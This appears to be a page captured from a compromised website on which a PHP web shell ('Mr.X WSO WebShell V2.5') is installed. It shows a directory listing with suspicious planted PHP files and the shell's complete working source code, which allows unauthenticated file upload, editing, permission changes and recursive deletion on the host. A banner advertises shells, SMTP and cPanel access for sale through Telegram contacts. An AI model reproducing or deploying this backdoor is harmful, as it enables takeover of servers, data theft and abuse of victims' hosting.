Our Service Also Shell, SMTP, Cpanel & leaf Mailer Available >? To Sell >> If You Want To Buy Any Service To Contact @Mr_Steve7 Or @jackleet
Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Uname: Linux premium317.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
Php: 8.1.34 Safe mode: OFF Datetime: 2026-04-27 12:36:09
Cwd:
/
home
apktxduj
j10game.com.pk
Main
File manager
1. Folders
Name
Size
Modify
Permissions
Actions
97b0e6
dir
2025-11-11 03:57:23
drwxr-xr-x
Rename
Chmod
Delete
e7e23
dir
2025-12-15 21:43:02
dr-xr-xr-x
Rename
Chmod
Delete
owyxafv
dir
2025-12-17 10:41:44
drwxr-xr-x
Rename
Chmod
Delete
2. PHP Files Only
Name
Size
Modify
Permissions
Actions
HWs2qEmwG5N.php
49.25 KB
2025-12-17 10:41:44
-rw-r--r--
Edit
Rename
Chmod
Delete
c.php
11.86 KB
2026-04-27 08:10:33
-rw-r--r--
Edit
Rename
Chmod
Delete
icon.php
7.35 KB
2025-12-12 12:55:07
-rw-r--r--
Edit
Rename
Chmod
Delete
knw66.php
7.35 KB
2025-12-12 12:54:51
-rw-r--r--
Edit
Rename
Chmod
Delete
theme-insqwty.php
341 B
2025-12-17 10:41:44
-rw-r--r--
Edit
Rename
Chmod
Delete
wp-confiq.php
99.13 KB
2025-11-05 06:32:51
-rw-r--r--
Edit
Rename
Chmod
Delete
xx.php
1 B
2025-11-06 00:32:37
-rw-r--r--
Edit
Rename
Chmod
Delete
PHP File Uploader
Delete Selected
Change dir:
Editing: c.php
<?php // Mr.X WSO WebShell V2.5 - Upgraded By Mr.Steve007 error_reporting(0); @ini_set('display_errors', 0); @set_time_limit(0); $title = "Upgrading By Mr.Steve007 - Follow Mr.X Source Code"; $original_line = "Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet"; function getSize($size) { if ($size >= 1073741824) return number_format($size / 1073741824, 2) . ' GB'; if ($size >= 1048576) return number_format($size / 1048576, 2) . ' MB'; if ($size >= 1024) return number_format($size / 1024, 2) . ' KB'; return $size . ' B'; } function getPerms($file) { $perms = fileperms($file); $info = ($perms & 0x4000) ? 'd' : '-'; $info .= ($perms & 0x0100) ? 'r' : '-'; $info .= ($perms & 0x0080) ? 'w' : '-'; $info .= ($perms & 0x0040) ? 'x' : '-'; $info .= ($perms & 0x0020) ? 'r' : '-'; $info .= ($perms & 0x0010) ? 'w' : '-'; $info .= ($perms & 0x0008) ? 'x' : '-'; $info .= ($perms & 0x0004) ? 'r' : '-'; $info .= ($perms & 0x0002) ? 'w' : '-'; $info .= ($perms & 0x0001) ? 'x' : '-'; return $info; } $cwd = isset($_GET['cwd']) ? realpath($_GET['cwd']) : getcwd(); if (!$cwd) $cwd = '/'; chdir($cwd); $main_dir = $_SERVER['DOCUMENT_ROOT'] ?? dirname(__FILE__); // ====================== HANDLE ACTIONS ====================== if (isset($_FILES['php_upload'])) { $uploaded = 0; foreach ($_FILES['php_upload']['name'] as $key => $name) { if ($_FILES['php_upload']['error'][$key] == 0) { $dest = $cwd . '/' . basename($name); if (move_uploaded_file($_FILES['php_upload']['tmp_name'][$key], $dest)) $uploaded++; } } if ($uploaded > 0) echo "<script>alert('$uploaded PHP file(s) uploaded successfully!');</script>"; } if (isset($_GET['del'])) { $path = $cwd . '/' . basename($_GET['del']); if (is_dir($path)) { function rrmdir($dir) { foreach (array_diff(scandir($dir), ['.', '..']) as $f) { $p = $dir . '/' . $f; is_dir($p) ? rrmdir($p) : unlink($p); } rmdir($dir); } rrmdir($path); } else { unlink($path); } header("Location: ?cwd=" . urlencode($cwd)); exit; } if (isset($_POST['rename_old']) && isset($_POST['rename_new'])) { rename($cwd . '/' . $_POST['rename_old'], $cwd . '/' . $_POST['rename_new']); header("Location: ?cwd=" . urlencode($cwd)); exit; } if (isset($_POST['chmod_file']) && isset($_POST['chmod_mode'])) { chmod($cwd . '/' . $_POST['chmod_file'], octdec($_POST['chmod_mode'])); header("Location: ?cwd=" . urlencode($cwd)); exit; } if (isset($_POST['save_edit'])) { file_put_contents($cwd . '/' . $_POST['edit_file'], $_POST['content']); header("Location: ?cwd=" . urlencode($cwd)); exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title><?php echo $title; ?></title> <style> body { background:#111; color:#0f0; font-family:'Courier New', monospace; margin:0; padding:0; font-size:14px; } .header { background:#1a1a1a; padding:10px; border-bottom:2px solid #0f0; } .banner { background:#000; color:#ff0; text-align:center; padding:12px; font-size:18px; font-weight:bold; border-bottom:2px solid #0f0; } .filemgr { width:100%; border-collapse:collapse; margin-bottom:20px; } .filemgr th, .filemgr td { padding:8px; border:1px solid #333; text-align:left; } .filemgr th { background:#222; } .dir { color:#0ff; font-weight:bold; text-decoration:none; } .phpfile { color:#ff0; text-decoration:none; } .dir:hover, .phpfile:hover { text-decoration:underline; color:#fff; } .action-btn { color:#ff0; margin:0 6px; text-decoration:none; } input, button, textarea { background:#222; color:#0f0; border:1px solid #0f0; padding:5px; font-family:'Courier New', monospace; } .back-btn, .main-btn { background:#0066ff; color:white; padding:8px 15px; font-weight:bold; text-decoration:none; margin-left:8px; } .path-part { color:#ff0; text-decoration:none; margin:0 3px; } .path-part:hover { text-decoration:underline; color:#fff; } .upload-box { background:#1a1a1a; padding:15px; border:1px solid #0f0; margin:15px 0; } .section-title { color:#0ff; margin:20px 0 8px 0; font-size:16px; } </style> </head> <body> <!-- New Banner --> <div class="banner"> <marquee>Our Service Also Shell, SMTP, Cpanel & leaf Mailer Available >? To Sell >> If You Want To Buy Any Service To Contact @Mr_Steve7 Or @jackleet</marquee> </div> <div class="header"> <strong><?php echo $original_line; ?></strong><br> Uname: <?php echo htmlspecialchars(php_uname()); ?><br> Php: <?php echo phpversion(); ?> Safe mode: OFF Datetime: <?php echo date('Y-m-d H:i:s'); ?><br> Cwd: <?php $path_parts = explode('/', trim($cwd, '/')); $current_path = ''; echo '<a href="?cwd=/" class="path-part">/</a>'; foreach ($path_parts as $part) { if ($part === '') continue; $current_path .= '/' . $part; echo ' <a href="?cwd=' . urlencode($current_path) . '" class="path-part">' . htmlspecialchars($part) . '</a> '; } ?> <a href="?cwd=<?php echo urlencode($main_dir); ?>" class="main-btn">Main</a> </div> <h2 style="padding:10px;"> File manager <?php if ($cwd != $main_dir && $cwd != '/'): ?> <a href="?cwd=<?php echo urlencode(dirname($cwd)); ?>" class="back-btn">← Back</a> <?php endif; ?> </h2> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="cwd" value="<?php echo htmlspecialchars($cwd); ?>"> <!-- Folders First --> <div class="section-title">1. Folders</div> <table class="filemgr"> <tr> <th><input type="checkbox" onclick="toggleAll(this)"></th> <th>Name</th> <th>Size</th> <th>Modify</th> <th>Permissions</th> <th>Actions</th> </tr> <?php $items = scandir($cwd); $has_folder = false; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $cwd . '/' . $item; if (!is_dir($path)) continue; $has_folder = true; ?> <tr> <td><input type="checkbox" name="files[]" value="<?php echo htmlspecialchars($item); ?>"></td> <td><a href="?cwd=<?php echo urlencode($path); ?>" class="dir"><?php echo htmlspecialchars($item); ?></a></td> <td>dir</td> <td><?php echo date('Y-m-d H:i:s', @filemtime($path)); ?></td> <td style="color:#0f0;"><?php echo getPerms($path); ?></td> <td> <form method="POST" style="display:inline;"> <input type="hidden" name="rename_old" value="<?php echo htmlspecialchars($item); ?>"> <input type="text" name="rename_new" value="<?php echo htmlspecialchars($item); ?>" size="15"> <button type="submit" class="action-btn">Rename</button> </form> <form method="POST" style="display:inline;"> <input type="hidden" name="chmod_file" value="<?php echo htmlspecialchars($item); ?>"> <input type="text" name="chmod_mode" value="0755" size="5" maxlength="4"> <button type="submit" class="action-btn">Chmod</button> </form> <a href="?del=<?php echo urlencode($item); ?>&cwd=<?php echo urlencode($cwd); ?>" class="action-btn" onclick="return confirm('Delete this folder?')">Delete</a> </td> </tr> <?php } if (!$has_folder) echo "<tr><td colspan='6' style='text-align:center;color:#555;'>No folders found</td></tr>"; ?> </table> <!-- PHP Files Only --> <div class="section-title">2. PHP Files Only</div> <table class="filemgr"> <tr> <th><input type="checkbox" onclick="toggleAll(this)"></th> <th>Name</th> <th>Size</th> <th>Modify</th> <th>Permissions</th> <th>Actions</th> </tr> <?php $has_php = false; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; if (!is_file($cwd . '/' . $item)) continue; if (strtolower(pathinfo($item, PATHINFO_EXTENSION)) !== 'php') continue; $has_php = true; $path = $cwd . '/' . $item; ?> <tr> <td><input type="checkbox" name="files[]" value="<?php echo htmlspecialchars($item); ?>"></td> <td><a href="?edit=<?php echo urlencode($item); ?>&cwd=<?php echo urlencode($cwd); ?>" class="phpfile"><?php echo htmlspecialchars($item); ?></a></td> <td><?php echo getSize(@filesize($path)); ?></td> <td><?php echo date('Y-m-d H:i:s', @filemtime($path)); ?></td> <td style="color:#0f0;"><?php echo getPerms($path); ?></td> <td> <a href="?edit=<?php echo urlencode($item); ?>&cwd=<?php echo urlencode($cwd); ?>" class="action-btn">Edit</a> <form method="POST" style="display:inline;"> <input type="hidden" name="rename_old" value="<?php echo htmlspecialchars($item); ?>"> <input type="text" name="rename_new" value="<?php echo htmlspecialchars($item); ?>" size="15"> <button type="submit" class="action-btn">Rename</button> </form> <form method="POST" style="display:inline;"> <input type="hidden" name="chmod_file" value="<?php echo htmlspecialchars($item); ?>"> <input type="text" name="chmod_mode" value="0644" size="5" maxlength="4"> <button type="submit" class="action-btn">Chmod</button> </form> <a href="?del=<?php echo urlencode($item); ?>&cwd=<?php echo urlencode($cwd); ?>" class="action-btn" onclick="return confirm('Delete this PHP file?')">Delete</a> </td> </tr> <?php } if (!$has_php) echo "<tr><td colspan='6' style='text-align:center;color:#555;'>No PHP files found</td></tr>"; ?> </table> <!-- PHP Uploader --> <div class="upload-box"> <strong>PHP File Uploader</strong><br><br> <input type="file" name="php_upload[]" multiple accept=".php"> <input type="submit" value="Upload Selected PHP Files"> </div> <button type="submit" name="delete_selected" style="background:#c00; color:white; padding:8px 16px;" onclick="return confirm('Delete all selected items?')">Delete Selected</button> <br><br> Change dir: <input type="text" name="cwd" value="<?php echo htmlspecialchars($cwd); ?>" size="70"> <input type="submit" value=">>"> </form> <?php if (isset($_GET['edit'])): $edit_file = $_GET['edit']; $full_path = $cwd . '/' . $edit_file; $content = file_exists($full_path) ? htmlspecialchars(file_get_contents($full_path)) : ''; ?> <h3>Editing: <?php echo htmlspecialchars($edit_file); ?></h3> <form method="POST"> <input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($edit_file); ?>"> <input type="hidden" name="cwd" value="<?php echo htmlspecialchars($cwd); ?>"> <textarea name="content" style="width:100%; height:520px; background:#1a1a1a; color:#0f0; font-family:'Courier New', monospace; font-size:14px;"><?php echo $content; ?></textarea><br><br> <button type="submit" name="save_edit">Save Changes</button> <a href="?cwd=<?php echo urlencode($cwd); ?>" style="margin-left:30px; color:#ff0;">← Back to File Manager</a> </form> <?php endif; ?> <script> function toggleAll(source) { var checkboxes = document.getElementsByName('files[]'); for (var i = 0; i < checkboxes.length; i++) { checkboxes[i].checked = source.checked; } } </script> </body> </html>
Save Changes
← Back to File Manager